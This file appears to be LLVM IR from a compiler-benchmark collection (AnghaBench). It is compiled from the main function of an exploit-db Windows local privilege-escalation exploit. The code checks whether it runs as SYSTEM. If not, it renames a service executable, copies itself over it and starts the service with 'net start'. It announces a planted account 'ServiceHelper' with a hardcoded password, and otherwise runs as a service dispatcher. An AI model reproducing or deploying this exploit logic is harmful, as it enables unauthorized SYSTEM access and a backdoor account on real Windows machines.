; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_16940.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_16940.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_3__ = type { i32*, i32* }

@.str = private unnamed_addr constant [7 x i8] c"SYSTEM\00", align 1
@.str.1 = private unnamed_addr constant [7 x i8] c"%s.bak\00", align 1
@PWN_EXE = common dso_local global i8* null, align 8
@stderr = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [34 x i8] c" :(  sorry, can't write to file.\0A\00", align 1
@.str.3 = private unnamed_addr constant [28 x i8] c"net start \22%s\22 2> NUL > NUL\00", align 1
@PWN_NAME = common dso_local global i8* null, align 8
@.str.4 = private unnamed_addr constant [81 x i8] c"\0A >:D should have created a \0A\0A Username:\09ServiceHelper\0A Password:\09ILov3Coff33!\0A\0A\00", align 1
@PWN_ID = common dso_local global i32* null, align 8
@ServiceMain = common dso_local global i64 0, align 8

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca [100 x i8], align 16
  %7 = alloca i32, align 4
  %8 = alloca i8*, align 8
  %9 = alloca [2 x %struct.TYPE_3__], align 16
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i32 100, i32* %7, align 4
  %10 = getelementptr inbounds [100 x i8], [100 x i8]* %6, i64 0, i64 0
  %11 = call i32 @GetUserName(i8* %10, i32* %7)
  %12 = bitcast [100 x i8]* %6 to i8*
  %13 = call i64 @strcmp(i8* %12, i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str, i64 0, i64 0))
  %14 = icmp ne i64 %13, 0
  br i1 %14, label %15, label %43

15:                                               ; preds = %2
  %16 = call i64 @malloc(i32 2048)
  %17 = inttoptr i64 %16 to i8*
  store i8* %17, i8** %8, align 8
  %18 = load i8*, i8** %8, align 8
  %19 = call i32 @memset(i8* %18, i32 0, i32 2048)
  %20 = load i8*, i8** %8, align 8
  %21 = load i8*, i8** @PWN_EXE, align 8
  %22 = call i32 @snprintf(i8* %20, i32 2048, i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i64 0, i64 0), i8* %21)
  %23 = load i8*, i8** @PWN_EXE, align 8
  %24 = load i8*, i8** %8, align 8
  %25 = call i64 @rename(i8* %23, i8* %24)
  %26 = icmp ne i64 %25, 0
  br i1 %26, label %27, label %31

27:                                               ; preds = %15
  %28 = load i32, i32* @stderr, align 4
  %29 = call i32 @fprintf(i32 %28, i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.2, i64 0, i64 0))
  %30 = call i32 @exit(i32 1) #3
  unreachable

31:                                               ; preds = %15
  %32 = load i8**, i8*** %5, align 8
  %33 = getelementptr inbounds i8*, i8** %32, i64 0
  %34 = load i8*, i8** %33, align 8
  %35 = load i8*, i8** @PWN_EXE, align 8
  %36 = call i32 @CopyFile(i8* %34, i8* %35, i32 1)
  %37 = load i8*, i8** %8, align 8
  %38 = load i8*, i8** @PWN_NAME, align 8
  %39 = call i32 @snprintf(i8* %37, i32 2048, i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.3, i64 0, i64 0), i8* %38)
  %40 = call i32 @printf(i8* getelementptr inbounds ([81 x i8], [81 x i8]* @.str.4, i64 0, i64 0))
  %41 = load i8*, i8** %8, align 8
  %42 = call i32 @system(i8* %41)
  br label %43

43:                                               ; preds = %31, %2
  %44 = load i32*, i32** @PWN_ID, align 8
  %45 = getelementptr inbounds [2 x %struct.TYPE_3__], [2 x %struct.TYPE_3__]* %9, i64 0, i64 0
  %46 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %45, i32 0, i32 1
  store i32* %44, i32** %46, align 8
  %47 = load i64, i64* @ServiceMain, align 8
  %48 = inttoptr i64 %47 to i32*
  %49 = getelementptr inbounds [2 x %struct.TYPE_3__], [2 x %struct.TYPE_3__]* %9, i64 0, i64 0
  %50 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %49, i32 0, i32 0
  store i32* %48, i32** %50, align 16
  %51 = getelementptr inbounds [2 x %struct.TYPE_3__], [2 x %struct.TYPE_3__]* %9, i64 0, i64 1
  %52 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %51, i32 0, i32 1
  store i32* null, i32** %52, align 8
  %53 = getelementptr inbounds [2 x %struct.TYPE_3__], [2 x %struct.TYPE_3__]* %9, i64 0, i64 1
  %54 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %53, i32 0, i32 0
  store i32* null, i32** %54, align 16
  %55 = getelementptr inbounds [2 x %struct.TYPE_3__], [2 x %struct.TYPE_3__]* %9, i64 0, i64 0
  %56 = call i32 @StartServiceCtrlDispatcher(%struct.TYPE_3__* %55)
  ret i32 0
}

declare dso_local i32 @GetUserName(i8*, i32*) #1

declare dso_local i64 @strcmp(i8*, i8*) #1

declare dso_local i64 @malloc(i32) #1

declare dso_local i32 @memset(i8*, i32, i32) #1

declare dso_local i32 @snprintf(i8*, i32, i8*, i8*) #1

declare dso_local i64 @rename(i8*, i8*) #1

declare dso_local i32 @fprintf(i32, i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @CopyFile(i8*, i8*, i32) #1

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @system(i8*) #1

declare dso_local i32 @StartServiceCtrlDispatcher(%struct.TYPE_3__*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
